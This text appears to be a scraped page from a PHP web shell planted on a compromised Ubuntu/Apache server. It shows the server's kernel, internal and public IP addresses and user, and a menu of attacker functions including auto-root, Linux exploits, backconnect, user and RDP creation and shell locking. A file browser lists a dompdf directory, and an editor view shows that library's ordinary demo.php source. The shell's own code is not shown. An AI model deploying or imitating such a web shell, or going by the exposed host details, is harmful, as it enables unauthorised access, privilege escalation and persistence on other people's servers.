Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.109.147
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdu /
libs /
dompdf /
www /
[ HOME SHELL ]
Name
Size
Permission
Action
cssSandpaper
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
controller.php
1.88
KB
-rwxr-xr-x
debugger.php
4.47
KB
-rwxr-xr-x
demo.php
1.95
KB
-rwxr-xr-x
examples.php
3.49
KB
-rwxr-xr-x
fonts.php
4.96
KB
-rwxr-xr-x
foot.inc
350
B
-rwxr-xr-x
functions.inc.php
1.42
KB
-rwxr-xr-x
head.inc
1.93
KB
-rwxr-xr-x
index.php
1017
B
-rwxr-xr-x
jquery-1.4.2.js
70.48
KB
-rwxr-xr-x
setup.php
9.23
KB
-rwxr-xr-x
style.css
3.92
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : demo.php
<?php require_once("../dompdf_config.inc.php"); // We check wether the user is accessing the demo locally $local = array("::1", "127.0.0.1"); $is_local = in_array($_SERVER['REMOTE_ADDR'], $local); if ( auth_ok() && $is_local && isset( $_POST["html"] ) ) { if ( get_magic_quotes_gpc() ) $_POST["html"] = stripslashes($_POST["html"]); $dompdf = new DOMPDF(); $dompdf->load_html($_POST["html"]); $dompdf->set_paper($_POST["paper"], $_POST["orientation"]); $dompdf->render(); $dompdf->stream("dompdf_out.pdf", array("Attachment" => false)); exit(0); } ?> <?php include("head.inc"); ?> <a name="demo"> </a> <h2>Demo</h2> <?php if (auth_ok() && $is_local) { ?> <p>Enter your html snippet in the text box below to see it rendered as a PDF: (Note by default, remote stylesheets, images & inline PHP are disabled.)</p> <form action="<?php echo $_SERVER["PHP_SELF"];?>" method="post"> <p>Paper size and orientation: <select name="paper"> <?php foreach ( array_keys(CPDF_Adapter::$PAPER_SIZES) as $size ) echo "<option ". ($size == "letter" ? "selected " : "" ) . "value=\"$size\">$size</option>\n"; ?> </select> <select name="orientation"> <option value="portrait">portrait</option> <option value="landscape">landscape</option> </select> </p> <textarea name="html" cols="60" rows="20"> <html> <head> <style> /* Type some style rules here */ </style> </head> <body> <!-- Type some HTML here --> </body> </html> </textarea> <div style="text-align: center; margin-top: 1em;"> <button type="submit">Download</button> </div> </form> <p style="font-size: 0.65em; text-align: center;">(Note: if you use a KHTML based browser and are having difficulties loading the sample output, try saving it to a file first.)</p> <?php } else { ?> <p style="color: red;"> User input has been disabled for remote connections. </p> <?php echo auth_get_link(); ?> <?php } ?> <?php include("foot.inc"); ?>
Close